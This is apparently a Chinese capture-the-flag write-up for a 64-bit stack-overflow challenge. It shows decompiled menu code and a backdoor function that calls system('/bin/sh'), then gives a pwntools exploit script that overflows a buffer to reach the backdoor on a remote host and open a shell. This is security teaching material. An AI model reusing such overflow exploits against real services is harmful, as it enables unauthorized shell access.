拿到文件先checksec一下
发现文件为64位,且开启NX保护
再看看idea
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [rsp+Ch] [rbp-4h] BYREF
init(argc, argv, envp);
puts(&s);
puts("Menu:");
puts(a1);
puts(a2);
puts(a3);
__isoc99_scanf((__int64)&unk_400A75, (__int64)&v4);
if ( v4 == 1 )
{
Data1();
}
else if ( v4 == 2 )
{
Data2();
}
else
{
Data3();
}
return 0;
}
int Data1()
{
char buf[48]; // [rsp+0h] [rbp-30h] BYREF
puts(&byte_400A78);
read(0, buf, 0x35uLL);
return printf(&format);
}
int Data2()
{
char buf[48]; // [rsp+0h] [rbp-30h] BYREF
puts(&byte_400AA8);
read(0, buf, 0x35uLL);
return printf(&format);
}
int Data3()
{
char buf[48]; // [rsp+0h] [rbp-30h] BYREF
puts(&byte_400AD0);
read(0, buf, 0x50uLL);
return printf(&format);
}
在主函数中我们发现三个选项,分别为Data1/2/3,我们分别点开函数发现,三者中唯有Data3存在足够的溢出可以使我们进一步操作。
同时我们发现函数中存在后门函数shell
int Shell()
{
return system("/bin/sh");
}
那么,这道题的大致思路已经明了
1、选择Data3(见ps)
2、构造栈溢出
3、getshell
那么久直接开始写脚本吧
exp:
from pwn import*
r = remote("123.60.135.228",2144)
r.sendline("9")
shell = 0x004007bd
payload = 'a' * 48 + 'a' * 8
payload += p64(shell)
r.sendline(payload)
r.interactive()
运行脚本后,选择咱们的溢出点3,然后执行cat flag,即可获得flag
PS:怎么选择Data3呢,感觉在好多人眼里这是一个再简单不过的问题,但是在以前这个问题难倒了我好一阵,所以,我选择在这里开一个小讲堂帮助一下那些跟我一样不知道也不敢问的家人们,大家可以各取所需
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [rsp+Ch] [rbp-4h] BYREF
init(argc, argv, envp);
puts(&s);
puts("Menu:");
puts(a1);
puts(a2);
puts(a3);
__isoc99_scanf((__int64)&unk_400A75, (__int64)&v4);
if ( v4 == 1 )
{
Data1();
}
else if ( v4 == 2 )
{
Data2();
}
else
{
Data3();
}
return 0;
}
我们可以看见,我们是依靠if函数来决定我们选择哪一个Data。而我们通过scanf函数来输入数据,从而改变v4的值,来实现选择。当v4等于1时,选择Data1,当v4等于2时,选择Data2,如果v4不等用于1或2,则执行Data3.那么我们只要通过向scanf发送不等于1或2的数,就可以执行Data3。
例:
r.sendline("9")